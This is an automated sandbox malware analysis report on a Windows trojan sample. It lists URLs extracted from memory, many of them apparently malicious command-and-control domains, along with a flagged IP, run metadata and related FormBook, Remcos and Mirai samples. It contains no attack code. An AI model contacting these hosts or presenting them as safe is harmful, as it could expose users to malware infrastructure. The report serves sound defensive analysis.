                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/money/careersandeducation/the-no-1-question-to-ask-in-a-job-interview-accoexplorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000002.2362200277.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.monicadenis.com/igbn/www.mckinleyint.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://word.office.comexplorer.exe, 00000010.00000003.2435222772.0000000009459000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.creatievecontentpeople.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.gbraises.com/igbn/www.bangunrumahkreasi.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.rumblerain.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.azure1224.xyzReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://outlook.comEexplorer.exe, 00000010.00000003.2435222772.0000000009459000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.freakyressop.xyz/igbn/www.rusticramble.onlineexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.creatingsobriety.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.history-poker.siteReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.creatievecontentpeople.com/igbn/www.itk.worldexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.history-poker.site/igbn/www.brasilbikeshopsc.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://outlook.comexplorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.prolongdogslife.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.noticeupluy.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.enet-insaat.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.betmonde396.comReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.monicadenis.com/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.creatievecontentpeople.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2368129929.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289901418.000000000BCA0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.cargizmos.netReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.nftcopyrights.xyz/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.mlharquitectura.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.mlharquitectura.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.freakyressop.xyz/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.freakyressop.xyz/igbn/www.nftcopyrights.xyzexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.azure1224.xyz/igbn/www.musiclessonsandmore.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.getrightspt.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://www.betmonde396.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://api.msn.com/v1/news/Feed/Windows?6iexplorer.exe, 00000010.00000003.2437268910.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://www.webinarcerdaskanindonesia.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.livewey.netexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.brasilbikeshopsc.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.getrightspt.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://www.musiclessonsandmore.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://www.prolongdogslife.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://www.creatievecontentpeople.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://www.rusticramble.onlineexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://www.enet-insaat.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.livewey.netReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://www.webinarcerdaskanindonesia.comReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  34.149.87.45
                                                                                                                                                                                                                  		td-ccm-neg-87-45.wixdns.netUnited States
                                                                                                                                                                                                                  		2686ATGS-MMD-ASUStrue

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1524408
                                                                                                                                                                                                                  Start date and time:2024-10-02 18:56:54 +02:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 9m 10s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:28
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:VFylJFPzqX.exe
                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                  Original Sample Name:acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@10/9@6/1
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                                                                                                  • Number of executed functions: 144
                                                                                                                                                                                                                  • Number of non-executed functions: 291
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.209.158, 2.23.209.176, 2.23.209.185, 2.23.209.189, 2.23.209.182, 2.23.209.181, 2.23.209.150, 2.23.209.177, 2.23.209.179, 2.23.209.140, 2.23.209.148, 2.23.209.149
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com.edgekey.net, a-0003.a-msedge.net, p-static.bing.trafficmanager.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, r.bing.com, api-msn-com.a-0003.a-msedge.net
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                  • VT rate limit hit for: VFylJFPzqX.exe

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  12:58:00API Interceptor238917x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                  12:58:37API Interceptor1589378x Sleep call for process: cmmon32.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  34.149.87.45http://www.hopp.bio/system802808Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.hopp.bio/system802808
                                                                                                                                                                                                                  http://www.hopp.bio/xentreservicelonelinerservice/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.hopp.bio/xentreservicelonelinerservice/
                                                                                                                                                                                                                  http://www.hopp.bio/homeatttupdatesystem/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.hopp.bio/homeatttupdatesystem/
                                                                                                                                                                                                                  0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.formytinyhome.com/lztc/
                                                                                                                                                                                                                  ojtBIU0jhM.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                  • www.project21il.com/v15n/?jL0=mpNYsDUcZmcNJCaLZJbaTUF3cJIt8ZB3rWyozfS6QmuFlBJoYbsDkDDYVEw5tDag3DFw&qN9=EFNxULM0Cf1t
                                                                                                                                                                                                                  https://ynjac.com/click?redirect=http%3A%2F%2Fwww.KineticAgency.com&dID=1724778304747&hashId=404941f7b6ec62dc57c0bc5f930858f35215fdf2f3368224f3526a5023c4bc3ded39&linkName=www.KineticAgency.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.kineticagency.com/
                                                                                                                                                                                                                  PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                                                                                  • www.martinminorgroup.com/oyqt/
                                                                                                                                                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.martinminorgroup.com/oyqt/
                                                                                                                                                                                                                  qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.century21morenoycia.mx/yroe/
                                                                                                                                                                                                                  NNj87.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.yamegoart.com/ve3w/

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  td-ccm-neg-87-45.wixdns.nethttps://kevinbeilgard.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  https://gyxgxuu.wixsite.com/junoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  https://goodnessmail.wixsite.com/my-site-1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  http://yhusbssgsuh.wixsite.com/my-siteGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  https://carpentevrt.wixsite.com/my-siteGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  http://esrrreynolds.wixstudio.io/my-siteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  http://dones9.wixsite.com/my-sitecvfcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  https://mqgb111tk4b6.wixsite.com/my-siteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  http://carolb1711.wixsite.com/my-siteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.87.45
                                                                                                                                                                                                                  http://replynwebsms.wixsite.com/my-siteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.149.87.45

                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  ATGS-MMD-ASUSyakov.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 48.170.193.198
                                                                                                                                                                                                                  yakov.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 48.31.2.229
                                                                                                                                                                                                                  yakov.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 48.249.96.183
                                                                                                                                                                                                                  yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 57.203.72.83
                                                                                                                                                                                                                  novo.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 34.157.218.225
